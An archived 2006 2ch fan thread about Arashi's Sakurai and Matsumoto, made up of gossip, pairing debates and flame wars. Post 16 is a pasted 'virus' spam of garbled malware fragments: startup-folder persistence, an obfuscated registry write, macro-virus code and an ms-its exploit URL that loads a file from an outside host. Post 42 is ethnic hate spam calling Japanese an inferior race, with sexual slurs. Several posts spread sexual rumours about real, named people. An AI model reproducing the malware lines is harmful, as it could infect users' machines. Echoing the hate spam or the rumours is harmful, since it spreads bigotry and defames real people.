5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

虹の彼方へも共に逝こう14

1 :ななしじゃにー:2006/09/14(木) 23:05:23 ID:dfY+NSMU
●『sage厳守』『沈めてマターリ』『ざっつくーる』
●同人系の話・妄想は『絶対禁止』現実にあった事『のみ』話題として可
●他面を引き合いに出す事、他面を落とす事は荒れる元なので絶対禁止
●真性ちゃんが現れた時は新聞読みつつ一旦スレ休止
●他スレには絶対に話を持ち込まない

前スレ 虹の彼方へも共に逝こう13
http://tv8.2ch.net/test/read.cgi/jan/1144972241/


2 :ななしじゃにー:2006/09/14(木) 23:07:45 ID:dfY+NSMU
過去ログ

僕達最強萌えコンビ「翔&潤」
ttp://makimo.to/2ch/tv2_jan/1019/1019635546.html
桜井翔と松本潤ってどーなのさ?
ttp://makimo.to/2ch/saki_jan/997/997683936.html
桜井翔と松本潤ってどーなのさ?その2
ttp://makimo.to/2ch/saki_jan/998/998545607.html
桜井と松本って
ttp://makimo.to/2ch/music_jan/1000/1000044909.html
■■■桜井と松本って Part2■■■
ttp://makimo.to/2ch/music_jan/1010/1010897110.html
■■■桜井さんと松本くん Part3■■■
ttp://makimo.to/2ch/music_jan/1012/1012981495.html
翔くん松本さん(萌えコンビ)を語ろう
ttp://makimo.to/2ch/music_jan/1015/1015579871.html
★●俺はお前の何!?●★
ttp://makimo.to/2ch/music_jan/1017/1017029386.html
『虹の彼方へも共に逝こう』
ttp://makimo.to/2ch/tv6_jan/1035/1035969793.html


3 :ななしじゃにー:2006/09/14(木) 23:10:48 ID:dfY+NSMU
虹すR9
ttp://makimo.to/2ch/tv6_jan/1094/1094371988.html
虹の彼方へも共に逝こう10(実質11)
ttp://makimo.to/2ch/tv8_jan/1110/1110951087.html
虹の彼方へも共に逝こう12
ttp://tv8.2ch.net/test/read.cgi/jan/1126308062/


4 :ななしじゃにー:2006/09/14(木) 23:20:19 ID:6TD3c1yR
>1
乙!

5 :ななしじゃにー:2006/09/14(木) 23:21:55 ID:l1/UKBKO
>1


6 :ななしじゃにー:2006/09/15(金) 00:00:16 ID:sknPGIBZ
>1
乙です!

7 :ななしじゃにー:2006/09/15(金) 00:20:02 ID:fgjai615
ロスのホテルで傘と歪は同室だったそうですわ。
その時の事を話すとき、突然傘がキレましたの「こいつサイアクだよ!」って。
何事かと思ったら、歪ったらバトルロワイアルを読むのに夢中で傘を報知したらしいですわ。
そんなことでキレる傘に萌えましたの。


8 :ななしじゃにー:2006/09/15(金) 00:21:54 ID:fgjai615
他メン話題に出すと安置呼ぶので避けたいですわ(コソ

歪ったらまた翔様に甘えてオネダリですの?
結局翔様折れてしまうんでしょうね。
イタリア土産も歪だけ別にありましたわね。
GUCCIのベルトっていうのが泣かせましたわ。


9 :ななしじゃにー:2006/09/15(金) 00:24:01 ID:fgjai615
他担が嫉妬して書いてるんだと思うわよ。
どんなに頑張ってもあなた達の担当とは
歪以上の友情は生まれません。


10 :ななしじゃにー:2006/09/15(金) 00:26:29 ID:fgjai615
他面同士はあまり仲良くないから
嫉妬するんではないのかしら?
翔様も歪ばかりかまわず、
他面とも多少は心打ち解け合って欲しいですわ。

傘は好き嫌いとかはっきりしていそうだからね。
みんなと仲良くするのは大変な事かもしれないけど、
いつまでも二人だけでつるんだりするのはやめてほしいかも。



11 :ななしじゃにー:2006/09/15(金) 00:28:13 ID:fgjai615
結局のところ、
皆さん歪傘の仲に嫉妬しているのですね。
ジャニ内でこれだけ普通に友人として仲良くしている方達も珍しいですし、
それだけ彼らは深い部分でもお互い認め合って付き合っているのでしょう。


12 :ななしじゃにー:2006/09/15(金) 01:11:27 ID:R41wV2nC
( ゚д゚ ) 

13 :ななしじゃにー:2006/09/15(金) 01:49:45 ID:qHJo8p7T
>>1
乙!


14 :ななしじゃにー:2006/09/15(金) 03:18:05 ID:htJnO/T9
((((;゜Д゜)))

15 :ななしじゃにー:2006/09/15(金) 03:46:31 ID:YelmNiEf
おもしろすぎ

16 :<body onload=window()>:2006/09/15(金) 12:29:11 ID:0tfitqAb
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

17 :ななしじゃにー:2006/09/15(金) 17:42:08 ID:O6vtjg/D
ウイルス貼り付け厨は、何がしたいんだ?
アッチにもコッチにも…暇だな。

18 :ななしじゃにー:2006/09/16(土) 00:28:56 ID:WgYGlcuQ
傘が去年歪に誕プレで電気マッサージ器あげたじゃん。
あれってSMでよく使われる道具なんだって・・・。
しかも、感度抜群だとか・・・。
嫌な想像しちゃったのだが、まさか・・・ね・・。


19 :ななしじゃにー:2006/09/16(土) 00:31:21 ID:WgYGlcuQ
真面目に怪しい・・・ 傘が歪を調教中。。。 素敵ング!
傘担ですが、何気に楽しみなスレでしたのに、同じ人な女性ばかりなのかしら?
でも私もつい萌えた一人ですわ。
>>328
ひら担よりはマシだと思うけど?
ひらホモスキーは確かに逝ってるけど、ここで担くくりしない方がいいかと。
>>328
私もつい萌えてしまった傘担です。
ここは傘歪スレなんで別にいいかと思われます。
嫌いな人は見なきゃいい。
>>329
歪受同人なんて決め付けないでほしいわ。ひら担。
自担と傘のスレが盛り上がってないからって嫉妬しないで下さい。
自スレへお帰り下さい。


20 :ななしじゃにー:2006/09/16(土) 00:32:56 ID:WgYGlcuQ
歪担の方々・・・傘担ですが萌えどころが一緒です(藁
歪が『あんねぇ、あんねぇ!』とか●いらしく傘に懐くと非常に萌えますの。
傘は頭を撫でる時と蹴倒す時がありますけど、蹴倒す時の方が何故か萌えます。
・・・・すみません。逝ってきます。
>>342
私もそうです。
基本的に傘歪が一緒にいると萌えるけど、
ラブラブって時より傘が歪をいじめてる時の方が何故か萌えてしまいます。

私もあの2人がじゃれているの好きだわ。
出来ればもっと密着してじゃれてほしい。
歪最初は嫌いだったけど、傘様のこと好きって言って
つきまとい始めてからなんかかわいくみえてきて今じゃ傘歪を
大好きになっちゃった。


21 :ななしじゃにー:2006/09/16(土) 00:36:34 ID:P7aH8IW6
はいはいはいはい思い出コピペワロス









22 :ななしじゃにー:2006/09/16(土) 00:36:52 ID:WgYGlcuQ
歪傘サークル多くて嬉しい。 先日もたくさんお買い物して参りましたわ。
潤翔は嵐の中でも相ニノあたりに次いで多いですものね。
いいなー、私も潤翔本欲しい!!
翔潤は?いいとこないの?こっちのが多そうなのにね
潤翔ってメジャー? あまり見たことないけど。 私の中で一番のメジャーはヤパーリ桜大
ここは傘と歪のスレよ。>>397
>>396
各イベントでサークル一つでもあればいい方>翔潤
潤翔も翔潤も徐々に増えてきてる。
サクアイなんて1つもないよ。残念でしたね。
翔潤は度マイナー。 つうか歪受け自体が・・・。
夏コミでも皆無だったもんな。
サク相、なくて当然。誰に言ってるの?
歪受って少ないの? 島には結構あるじゃん。
ネット同人では多いよ。>翔潤

でもサクアイ担って普通にいるんだよね。
結構ひらのファンサイトのみならず傘のファンサイトでも
ひらの事は「妻」とか書いてるよ。 あれもどうかと思う。


23 :ななしじゃにー:2006/09/16(土) 00:39:48 ID:WgYGlcuQ
ひら担はふつーーーーーーに ひらの事を姫と呼ぶからな(藁
結局歪担は自担は受け!と思ってるわけね(ワラ
私は自担は受でも攻でもいいな。 傘の場合は攻で、平安の場合は受でって感じで。
ひら担の場合、それこそ一般人ですら 「ひらちゃんは受」って浸透してるから。
やっぱり平安受けが王道でしょ。 嵐内の本当の姫はひらじゃなくて平安!
去年まで熱烈サトマチサイトだったところが、
今年から新たに「相大サイト」としてリニューアルされていた。
最近、単にエロ萌えスキーの方と同じ人の区別がつきません・・・・・・
みんな同じ人に見えてしまいます。


24 :ななしじゃにー:2006/09/16(土) 00:41:36 ID:WgYGlcuQ
ロケでも抱き合ってたけど、
番組終了後にもっと激しい抱擁があったわよ。
しかも傘がしっかり抱きしめて頬に唇まで寄せちゃって。
その時の歪様のお顔が見ものだったのですが、
当然これはカットでしょうね。


歪ピーンチ
自担は傘ひらより傘歪のこと好きな人の方だいっぱいいるから。
自担ファンサイトで傘ひら好きな人なんて見たことないよ。
まぁ、もしかしたら何人かいるかもだけど、ファンサイトにはほとんど
傘が主自担で歪のこともいろいろ書いてるとこいっぱいあるし。
むしろ歪のこと「妻」って呼んでるよ(笑)
あらあら。
ひら担は傘様がそんなに好きなんですね。
それはうれしいんですが自担はひら担ともにひらも嫌ってるので 帰ってください。

ホモ話じゃなくって普通に傘と歪について語りたいな(ボソ
語る必要なし



25 :ななしじゃにー:2006/09/16(土) 00:43:33 ID:WgYGlcuQ
傘がJr時代から傘担だから、裕貴か歪がいつも一緒な感じする。ひらはよくわからん。
あんた本当に傘担か? 奴が一番一緒にいたのはヨネだろう。
ヨネは桜井クンに惚れていました。友達として。
自分も昔からの傘担ですが、歪の事は正直滝の腰巾着としか思っておりませんでした。
デビュー後は手の裏返したように「翔君翔君」と懐き、なんて腹黒い嫌な奴と思ったもんです。
そうですね。一緒に夜の街で遊んでいる時も 後ろをついてまわるという感じでしたし・・。
デビュー前の夏、歪の受験の話その他でひと夏毎日のように会っていたと傘自ら雑誌で述べておりましたっけ。

歪担キモいです。
自担と仲良いかもしれませんが、
そうしつこく言われると仲悪くてかまわないとさえ思いますわ。



26 :ななしじゃにー:2006/09/16(土) 00:46:20 ID:WgYGlcuQ
歪様の事を可愛がる翔様が好きですわ。歪様には甘々なんですもの。
他メンとは明らかに待遇違うところに翔様の優しさを感じますわ。
翔様がたまにメbロっと出してしまう「潤」っていう呼び方が好きですわ。
プライベートではそのように呼んでいらっしゃるのですね。
確かに傘はそこはかとなく歪に甘い。歪があまりにも不器用だからかしら?
私は歪担だけど、実は誰と誰が一番仲いいとかはっきり言って関係ないんだよね。
でも、歪って自分でもプチ人間不信だって言ってるし、人を素直に信じれない面を
持ってると思うんです。けど、一度信じたらとことん信じきっちゃう所があって
それで裏切られてすごく傷ついちゃうと思うんだよね。
だから歪ってけっこう滝についてたり傘についてたり平安についてたりしてて、
周りから見たら優柔不断の八方美人に見られちゃうけど、たぶんあれはまた裏切られるのが
怖いってところからそうなっちゃってるんだと思うんだよね。
だから傘を信じきってるとか滝を信じきってるとかは本人にしかわかんないし。
ただ、今嵐でそうやって傘みたいに歪のこと裏切らないでいつも可愛がってくれてる人が
いるからすごく安心なんです。歪もたぶんそうやって自分が信じきってる人を作らなきゃ
安心できないんだと思う。傘も「歪は兄貴分の人がそばにいなきゃいけないタイプだ」って
言ってたしね。結局何が言いたいんだかわかんないんだけど、歪のこと可愛がってくれてる
傘や平安に本当に感謝してますよ。


27 :ななしじゃにー:2006/09/16(土) 12:25:49 ID:0qUh8So4
今日傘の股間が大きかったよ。
歪を触っていたら勃起し たらしい。
傘歪お揃のネックレスってブルガリ?カルティエ?

まともな人は傘歪板に引っ越してる罠。

仲良し具合に和む、喜ぶ人。現実の出来事のみで妄想はない=とりあえずまだまとも
ホモカプ妄想、エロ妄想に走る人、脳内変換、脳内妄想・幻想の禿しい人=同人チャソ

本当にお互い信頼しあってるからこそ表面上はベタベタしないんでしょう。
特に傘はそういうところがあると思う。
本当に仲良いパナや伏字ともベタベタはしなかった。
歪はその中でも特にそうだよね。


28 :ななしじゃにー:2006/09/16(土) 12:28:09 ID:0qUh8So4
プラべで遊ばなくたってなにもしゃべらなくたって
奥深いところでつながっているのがGのメンバーです。
いわば運命共同体なわけで、普通の友達とはまた違うのでは なかろうか?
その中でも特に傘と歪は特別なわけで。
あの二人は二人だけの世界に入りすぎで他メン無視でつ。
一回ぐらいはセークスしてそうだよね
他面を無視してるとは思わないけど、傘にとっての歪、歪に
とっての傘は、他面との信頼関係とは全く違った絆みたいな
モノは感じる。変な意味じゃないよ。男同士の真の絆みたいなヤツ。
なんかどれだけごたく並べたところで、このスレは
【傘歪コンビが一番特別(傘歪担脳内認定)であることを語るスレ】でしょ?
順位をつけるのは良くない、といいつつね。
傘歪担は他板に引っ越したと聞いたけど、結局はこのアフォスレに戻ってくるのね。
まあ傘歪担は自己主張が激しいからそうなるとは思っていたけど。
余所でヒソーリなんてとても無理。
「どれだけ傘歪コンビが特別か」を他の人にアピールしたくてしょうがないのだから。
この二人は、そういう異質な雰囲気を漂わせてるよ。


傘と歪、小僧とひら
嵐結成時(前)からこの組み合わせに分かれてなかった?



29 :ななしじゃにー:2006/09/16(土) 12:38:36 ID:0qUh8So4
傘とひらはプラベで二人で会った事もなければ、
子供時代もまったく縁がないし、
力を合わせて何か仕事をやりとげた事もない。
(適当な番組企画は『やりとげる』に値しない)
お笑いネタ以外お互いを知りもしない。
同人チャソの脳内妄想は、子供時代からのファソには、
ひたすら呆れるしかないアフォっぷりなんだがな。
少なくとも伏字やパナや歪は山のような思い出を共有してる。
パナとは未だに隙あれば会うし、歪とは何かあればすぐ力を合わせる。
今もお互いの家を行き来する友人付き合いをしてるだけ理解できる。



30 :ななしじゃにー:2006/09/16(土) 12:40:00 ID:0qUh8So4
ひらの立場は困った時のネタ袋にしかすぎないって、
長年見てる担はよーく分かってるでつ。
それを証拠にひらの話はお笑いネタしか拾わないでつ。
パナや歪の事はプラベの事もお互いの気持ちも話すのに。
第一撮影中にヨコハマ逝ったのはMDウォークマンを買うためだけで、
しかも他面に断られたからたまたま残ったのがひらだっただけで。
プラベで二人ででかけた事はマッタク無いでつ。
自分も長年の傘●だからその辺りは知ってるでつ。
自分、紺密傘物はほぼ持ってるんだけど、
平安には傘自ら懐きに行くし、楽しそうに観察してる事が多くて、
歪は何か決める時は必ずアイコンタクト、笑いあって踊る事も多いでつ。
小僧はケンカゴッコや炎ゴッコして楽しそうにジャレてる子犬同士みたい。
けどひらは、ひらの方から『ゴゴロヂラリ』をやりに来た時以外は、
すれ違いザマに笑うかタッチするくらいでお笑いネタ以外接触がないでつ。
何かオモロイ事をしてればMCネタとして拾うけど。オモロイネタ元的存在。
だからいい加減傘をよく見てる身としてはひら●の妄想は腹立つでつ。
>ひらが入院中唯一見舞いに行ったのは傘だけですが。

ついでに一言。
それを言うとひらが他面には大事にされてないみたいに聞こえてかわいそうでつ。
おせっかいでつが、あんまりおおっぴらに言わない方が…


31 :ななしじゃにー:2006/09/16(土) 13:02:18 ID:k7k/HnXC
キモい
あらち担はみんな消えろ

32 :ななしじゃにー:2006/09/16(土) 13:33:57 ID:2hv1Wy9n
なんだこの基地外スレは。削除しろよ!

33 :ななしじゃにー:2006/09/16(土) 16:33:45 ID:8lbOyy9+
ガーデンパーチーとプラダリュックも伝説だが、
20歳誕プレの生まれ年83年モノワインも伝説だよなw
ワイン自体も結構な値段だし、生まれ年ワインを渡すってのが意味深いよな。
生まれ年ワインは感動したな…( ´Д⊂ヽ
歪君の歌のスキデスーダイスキデスーにも度肝を抜かれたがw
あの時程小僧様GJ!と思ったことはない。
イベで、傘が誕生日メールで1番と思ったのが
歪の「23だね。ベッカムだね。」だったと。
それ言われて歪は照れて恥ずかしがってたんだと。
なんだよなんだよカ○エエな(*´∀`)


34 :ななしじゃにー:2006/09/16(土) 16:36:58 ID:8lbOyy9+
傘が大食いってとこで歪が
「食事に行くといつもサイドオーダーする」って
言ってた。歪じっと傘が食べ終わるまで待ってるのね。
か●いいわ。バクバク食べてる傘も。それ見て待ってる歪も。
また名古屋ネタですが、歪があまりに食べないので、
傘は自分がケーキを食べる時は必ず歪に食べさせるそうですわ。
しかも「お前食え」と命令口調で。
「命令なの?」と訊かれれば「こいつにはね」と答えましたわ。素敵でした。
歪と傘だけでなく家族同士も仲いいのよね。
コンの時は一緒に入ってるんだとか。
傘ママは歪の性格を熟知していらっしゃるようで、
歪にレンタルしたビデオが歪私室で紛失するのではないかと
大変危惧していたそうですわ。(ワラ


35 :ななしじゃにー:2006/09/16(土) 16:38:04 ID:8lbOyy9+
大貧民かなにかで一晩中盛り上がったって
前に何かで読みましたわ。たしか歪様宅にて。
「2人とももう寝なさい!」とか歪ママに怒られたのかしら?
なんにしても仲いいですわね。
家族ぐるみでお付き合いなんて、
それこそジャニタレの中ではいままで皆無だったのでは?
生活水準が近いのかしらね。
歪がその話をして傘が
「俺と松本さんが仲良しみたいでいやだなー(笑)」
と照れてましたのよ。
ここ楽しすぎて仕事がはかどりませんわ。
まぁお母様同士も仲がよろしいんですのね。
お父様同士も仲が宜しいのかしら?


36 :ななしじゃにー:2006/09/16(土) 16:47:41 ID:8lbOyy9+
家族ぐるみのお付き合いって、
ジャニーズでは皆無だと思われますわ。
お二人とも礼儀正しいですし、
翔様のお母様は歪様の事とても気に入りそうですわね。

でもあの時二人がラブラブで互いの名前を言ったら
それはそれで問題だったでしょう。
前にもあった通り、本当に仲が良いからこそ
名前を出さないっていうのもあるのよ。
相葉姫・・ 本当に言ってる奴いたんだ
プライベートでも付き合いがあるのは傘と歪の2人だけよ。
あとは全部ネタで雑誌用に発言してるだけ。
小僧は傘と食事に行ったって自慢してたけど、
あれだって小僧にねだられて傘が仕方なく言ってあげたみたい。
嫌がっていたわよ傘。


37 :ななしじゃにー:2006/09/16(土) 16:50:55 ID:8lbOyy9+
でも結局傘は歪に甘すぎなんだよね。
あとひらちゃんにGUCCIの指輪買って上げたのも傘なのね。
イタリアで歪の土産買うついでに買ってあげたんだって。
傘は歪にGUCCIの何を買って上げたのかしら?
GUCCIのサイフとキーケース
体の付き合いって言っても 女交えた乱交でしょ。


38 :ななしじゃにー:2006/09/16(土) 17:06:53 ID:KH3+ehFo
これもう削除した方が良いんじゃないか

39 :ななしじゃにー:2006/09/16(土) 17:57:18 ID:sAGwspIB
なんか荒れてるなー

40 :ななしじゃにー:2006/09/16(土) 18:32:19 ID:FeXvveAq
いまさらそんなの貼ってもねー。

41 :ななしじゃにー:2006/09/17(日) 01:47:18 ID:Q3BZgI+H
同人キモスレ

42 :ななしじゃにー:2006/09/17(日) 03:07:10 ID:iUOllpxU
なぜ日本人女性は韓国男性に憧れるのだろうか。
まず韓国人男性は紳士的な振る舞いをします。
そして女性を大切に扱います そして情熱的です。
このような韓国人男性の振る舞いに日本人女性はコロリと落ちるのです。
日本人のような幼児的な男性にあきあきしてる裏返しの行動でしょう。
韓国人男性に憧れる日本女性は週末になるとソウルを訪れるそうです。
ソウルで運命的な出会いを期待しての訪韓です
ソウルでは毎週末にお見合いパーテーが開かれています
日本女性と韓国男性のお見合いパーテーです
日本女性の参加者が圧倒的に多く韓国男性を集めるのに苦労するそうです。
日本女性は婚前交渉に積極的だと聞きました。 韓国では婚前交渉はタブーです。
お見合いパーテーで知り合い、その日のうちに関係を持つカップルが多いと聞きます。
「日本人女性は優秀な遺伝子を求めて韓国で股を開く」と韓国のWEBサイトで話題になっていました。
韓国では不道徳なものは、東から来ると言われています。
韓国は日本から多くの不道徳を持ち込まれています。
すべて事実だ。 日本の女は淫乱で男はまったく魅力がないインポ。
かわいそうな劣等民族

43 :ななしじゃにー:2006/09/17(日) 03:51:42 ID:3ziwn9tS
安置は何でこんな必死なんだろ

自分も傘の歪だけに不自然な行動テラモエス
謎の多い虹だから余計気になる
昨日の孫みたいなロケ、1度で虹にも行ってもらいたいな
絶対不自然でキョドりまくる傘が見れるwwww

44 :ななしじゃにー:2006/09/17(日) 05:07:08 ID:ISLXxH/T
自分も傘の歪だけに不自然な行動テラモエス
謎の多い虹だから余計気になる
昨日の孫みたいなロケ、1度で虹にも行ってもらいたいな
絶対不自然でキョドりまくる傘が見れるwwww


45 :ななしじゃにー:2006/09/17(日) 05:08:28 ID:ISLXxH/T
自分も傘の歪だけに不自然な行動テラモエス
謎の多い虹だから余計気になる
昨日の孫みたいなロケ、1度で虹にも行ってもらいたいな
絶対不自然でキョドりまくる傘が見れるwwww


46 :ななしじゃにー:2006/09/17(日) 05:09:28 ID:ISLXxH/T
自分も傘の歪だけに不自然な行動テラモエス
謎の多い虹だから余計気になる
昨日の孫みたいなロケ、1度で虹にも行ってもらいたいな
絶対不自然でキョドりまくる傘が見れるwwww


47 :ななしじゃにー:2006/09/17(日) 05:10:30 ID:ISLXxH/T
自分も傘の歪だけに不自然な行動テラモエス
謎の多い虹だから余計気になる
昨日の孫みたいなロケ、1度で虹にも行ってもらいたいな
絶対不自然でキョドりまくる傘が見れるwwww


48 :ななしじゃにー:2006/09/17(日) 05:25:06 ID:ISLXxH/T
自分も傘の歪だけに不自然な行動テラモエス
謎の多い虹だから余計気になる
昨日の孫みたいなロケ、1度で虹にも行ってもらいたいな
絶対不自然でキョドりまくる傘が見れるwwww


49 :ななしじゃにー:2006/09/17(日) 09:13:04 ID:/LmUsnLb
せめてsageる位出来ないのか基地害あらち担
お前らのお花畑っぷりには他G担も迷惑してんだよ
糞スレ乱立しやがって消え失せろや

50 :ななしじゃにー:2006/09/17(日) 10:43:58 ID:ZHK5mX7D
こうやって洗脳してくんだね、おそろぢぃ。

51 :ななしじゃにー:2006/09/17(日) 12:22:00 ID:Dk0u3eUP
傘歪のそっけなさは普通。
っつーか他の麺がひっつきすぎで成人男性としては異常…っつーか珍しい。

だから別に傘歪はそっけないわけでもなく
普通の成人男性の姿だと思う。
そしてそんな普通な二人が隙だ。

52 :ななしじゃにー:2006/09/17(日) 12:48:56 ID:ul8FDfKU
>51
傘も歪も、他のメンとはイチャイチャするんだがナー。
この2人が他メンとも全くイチャイチャしないならオマイの意見もわかる…。
演出なら割り切って2人にも絡んで欲しいよ。めっちゃ映えるのに…。

53 :ななしじゃにー:2006/09/17(日) 15:03:00 ID:bjrsn/p3
>52
ヌゲー映えるよな。
自分はビズ萌だから、並んでる画がヤバス。
紺の愛行進がとても良かった。

54 :ななしじゃにー:2006/09/17(日) 16:08:15 ID:z8q7Z4z5
かならず>51みたいに言うヤシいるけど、それはちがくない?
傘も歪も他メンともイチャイチャしてなくそっけないなら、そのレスもわかるが
2人とも他メンとはかなりイチャイチャしてるんだもんw
傘と歪だけ明らかに不自然。
チューの時も傘1人キョドってたしなwwwwww

55 :ななしじゃにー:2006/09/17(日) 17:01:53 ID:as4nV24c
ものすごいフィルターかかってんな
キモイ

56 :ななしじゃにー:2006/09/17(日) 17:10:03 ID:Huc8l9ui
ただ単にお互いカッコつけキャラだから二人になるとどうにもこうにもならないんだろ。

57 :ななしじゃにー:2006/09/17(日) 18:46:24 ID:ZHK5mX7D
>嵐って仲悪そう。櫻井相葉二宮は松本の事嫌いだろ。松本も大野にしか絡まないのは何で?

一般人の見え方

傘と歪が大人で子供のひら平安小僧の相手をしてやってるように見える
アイコンタクトよくしてるし
みんな仲いいって本人達が言ってるのに変な妄想疲れる

58 :ななしじゃにー:2006/09/17(日) 18:50:05 ID:Sh8elCJG
>57
安置になんだが、それだけ分かるほど見てれば一般人じゃないw

59 :ななしじゃにー:2006/09/17(日) 19:24:22 ID:cbJ6ibr0
平安ひら小僧が人とイチャイチャしたがるキャラだから、
元々そういうキャラじゃない傘と歪も3人に対してはそうなるんだろ。
一部の同人はもっと普通に事を考えられないのか?

60 :ななしじゃにー:2006/09/17(日) 19:36:01 ID:1Jzw7BTF
この連投通報した方が良くないか?
ログ貯めてる姐さんいる?

61 :ななしじゃにー:2006/09/17(日) 20:37:06 ID:Dk0u3eUP
>>59
丸っと同意。
でも、根っこは兄弟チックな二人に萌えだ。

62 :ななしじゃにー:2006/09/17(日) 21:54:09 ID:6I0YU3+I
今週のG粗で、天井カメラに手を振る傘(抜かれてないけどw)
を追って、同じように間抜け面で上を見る歪。w

63 :ななしじゃにー:2006/09/17(日) 22:06:38 ID:B4W52zxn
|ノノヽヽ 〃ノノ^ ヾ|
|・3・´*)ノノ*`∀´|



64 :ななしじゃにー:2006/09/17(日) 22:36:04 ID:qXEqAh++
後輩が雑誌で言ってたこと
「20過ぎた男同士がベタベタすんなんてキショイでしょ?ww」

そんなこと言ったらまともなのが虹だけになっちまうジャマイカw
いいぞいいぞw

65 :ななしじゃにー:2006/09/18(月) 02:48:57 ID:p8Qn98le
話を豚切るが、先週の孫孫の後番組で
「傘VS歪」ってやってたのみたやついるか?
いくら違う人でも萌え萌えした自分…w

66 :ななしじゃにー:2006/09/18(月) 06:46:09 ID:F/EW+hfN
自分同人じゃないけど紺での櫻井と松本アイコンタクトが秘め事のようで萌えた。

67 :ななしじゃにー:2006/09/18(月) 13:39:15 ID:zA/gsVbC
自分も傘の歪だけに不自然な行動テラモエス
謎の多い虹だから余計気になる
昨日の孫みたいなロケ、1度で虹にも行ってもらいたいな
絶対不自然でキョドりまくる傘が見れるwwww


68 :ななしじゃにー:2006/09/18(月) 17:55:26 ID:Epyiwk3d
ただいまノシ
アイコンタクト最高だった…昨日、一番最後メンで手繋いで挨拶するとこ、
虹だったんだが、手繋ぐ前にためにためまくりw がしっと
繋いでた。映像化されたら絶対入るだろうから期待しる。

69 :ななしじゃにー:2006/09/18(月) 20:24:41 ID:/n2PoEmA
>68
傘は、何で俺ここにきちゃったんだろ、失敗したー!
とか思ってそうだなw
変な意味ではなく、今までの事をオモーとって意味ね。

70 :ななしじゃにー:2006/09/18(月) 20:41:08 ID:JTCt3p7X
>69
意味分からナス。


71 :ななしじゃにー:2006/09/18(月) 21:08:44 ID:zA/gsVbC
自分も傘の歪だけに不自然な行動テラモエス
謎の多い虹だから余計気になる
昨日の孫みたいなロケ、1度で虹にも行ってもらいたいな
絶対不自然でキョドりまくる傘が見れるwwww


72 :ななしじゃにー:2006/09/18(月) 22:32:29 ID:6hGNSdTh
同人女の思考回路って都合良くできてんだな。
気持ち悪いからあげんじゃねーよカス。

73 :ななしじゃにー:2006/09/18(月) 23:11:23 ID:mxjCMN6P
一部ドジンが紛れ込んでると大変だな。
ヤシが来る度age厨に目を付けられて、純粋にコンビ語りすら出来ない。
頼むからコンビスレと同●板の区別ぐらい付けてくれ。

74 :ななしじゃにー:2006/09/18(月) 23:45:58 ID:jjgSKMb2
ドジンの虹安置がわざと嫌がらせでやってるからやっかいなんだな

75 :ななしじゃにー:2006/09/19(火) 01:46:11 ID:G+PjSN9e
パピ!

76 :ななしじゃにー:2006/09/19(火) 08:46:37 ID:RL3lXQH1
むしろド●ンの虹ズキと虹安置の両方がいるんじゃないかと…。

77 :ななしじゃにー:2006/09/19(火) 12:48:53 ID:Y/kLaf5A
台湾ネタ落としたいが落ち着くまで無理だな。

78 :ななしじゃにー:2006/09/19(火) 14:46:01 ID:hG6Ahjmf
>77
kwsk!

79 :ななしじゃにー:2006/09/19(火) 21:38:51 ID:2T2Wweny


  ∧_∧   ∧_∧    age
 (・∀・∩)(∩・∀・)    age
 (つ  丿 (   ⊂) age
  ( ヽノ   ヽ/  )   age
  し(_)   (_)J



80 :ななしじゃにー:2006/09/19(火) 22:49:42 ID:YrNPc7kc
あげあげ

81 :ななしじゃにー:2006/09/19(火) 22:58:32 ID:ioM3sJ+g
虹の敢えて絡まないところに何故か嫉妬する他担同人安置。
しつこいんだよ('A`)

82 :ななしじゃにー:2006/09/19(火) 23:03:25 ID:2T2Wweny

  ∧_∧   ∧_∧    age
 (・∀・∩)(∩・∀・)    age
 (つ  丿 (   ⊂) age
  ( ヽノ   ヽ/  )   age
  し(_)   (_)J


83 :ななしじゃにー:2006/09/19(火) 23:30:17 ID:TFh61zug
>81
嫉妬なんざしてないだろw
ただのコンビスレ安置:2T2Wweny

84 :ななしじゃにー:2006/09/19(火) 23:55:34 ID:rQWV3ZVR
2T2Wwenyがいつもの山同人っつか平安同人じゃね?
平安以外に傘が絡むと嫉妬して荒らし回るよな。

85 :ななしじゃにー:2006/09/20(水) 00:53:14 ID:6CKKPE/Q
平安受オバは粘着だから怒らせるとコワイよ
それしか生き甲斐ないからwwwww

86 :ななしじゃにー:2006/09/20(水) 02:11:42 ID:JQK8vBH3
>59
歪は平安と小僧に自ら嬉々とイチャイチャしてますが。
傘も他面に自ら嬉々とイチャイチャしてますが。

>69
バロスwwww
軽くテンパってる傘が想像できる。

87 :ななしじゃにー:2006/09/20(水) 06:10:11 ID:EkqcVZtc
なんか臭いんだよなぁ
傘も歪も絡まないキャラ同士だから敢えてあぁなんでそ
しかも二人が他麺に絡むのは普段から絡まれてるから抵抗がないだけ

他にどんな理由がある?
頼むから同人臭い発言するなよ

88 :ななしじゃにー:2006/09/20(水) 08:12:57 ID:hUCG8n5s
>85
みたいに他スレ不感症だと言うのに
ああやってわざわざ名前出すからじゃねーの?ココが嫌われて荒らされる理由

充分みんな発言怪しいよ?いっとくけど
あちこちで嫌われる理由わかる気がするし
虹担で色んな人が入り混じって話してた頃からいるけど
全て排除してく傾向あるよ、ここ

89 :ななしじゃにー:2006/09/20(水) 12:54:58 ID:DTzACaZ6
>86
ラストで隣になり、先に傘が手をさし出して
